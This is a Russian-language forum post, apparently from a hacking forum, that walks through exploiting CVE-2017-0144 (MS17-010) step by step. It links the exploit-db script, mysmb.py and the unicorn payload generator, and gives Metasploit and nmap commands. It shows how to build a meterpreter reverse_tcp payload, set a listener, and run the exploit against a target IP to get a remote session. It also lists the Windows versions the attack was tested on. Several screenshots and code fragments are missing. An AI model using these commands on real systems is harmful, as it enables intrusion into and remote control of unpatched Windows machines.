CVE-2017-0144 |MS17-010
@webwareВсем привет, сегодня я вам покажу как эксплуатировать CVE-2017-0144, начнем.
Качаем это:
https://www.exploit-db.com/exploits/42315/
и это:
https://github.com/worawit/MS17-010/blob/master/mysmb.py
и вот это:
https://github.com/trustedsec/unicorn
Кидаем все в одну папку и создаем файл:Код:
touch _init_.py
Следующим шагом заходим в metasploit.
Пишем:
use auxiliary/scanner/smb/pipe_auditor set rhosts <ваша цель> run
Должно появиться это:

Теперь пишем:
nmap -A -p 445 <ваша цель>
Нас интересует это:

Далее пишем:
gedit <название файла скачанного отсюда https://www.exploit-db.com/exploits/42315/>
Там, где USERNAME, пишем что получили в nmap(guest)
Ищем этот фрагмент кода:

Убираем комментарий с этой строчки:

Приводим строчку в такой вид:

Теперь создадим нагрузку:
python unicorn.py windows/meterpreter/reverse_tcp <ваш ip> <порт>
Открываем файл powershell_attack.txt копируем содержимое и вставляем сюда:

Удалим кавычку в конце:

Сохраняем файл.
Выставляем прослушку в metasploit:
use exploit multi/handler set lport <port> set lhost <ваш ip> set payload windows/meterpreter/reverse_tcp exploit
Эксплуатируем:
python <название файла скачанного отсюда https://www.exploit-db.com/exploits/42315/> <ip цели> <pipe>(например netlogon)
Выполняем команду до тех пор пока не появиться это:

Нам прилетает сессия)

Протестировано на:
- Windows 2016 x64 - Windows 10 Pro Build 10240 x64 - Windows 2012 R2 x64 - Windows 8.1 x64 - Windows 2008 R2 SP1 x64 - Windows 7 SP1 x64 - Windows 2008 SP1 x64 - Windows 2003 R2 SP2 x64 - Windows XP SP2 x64 - Windows 8.1 x86 - Windows 7 SP1 x86 - Windows 2008 SP1 x86 - Windows 2003 SP2 x86 - Windows XP SP3 x86 - Windows 2000 SP4 x86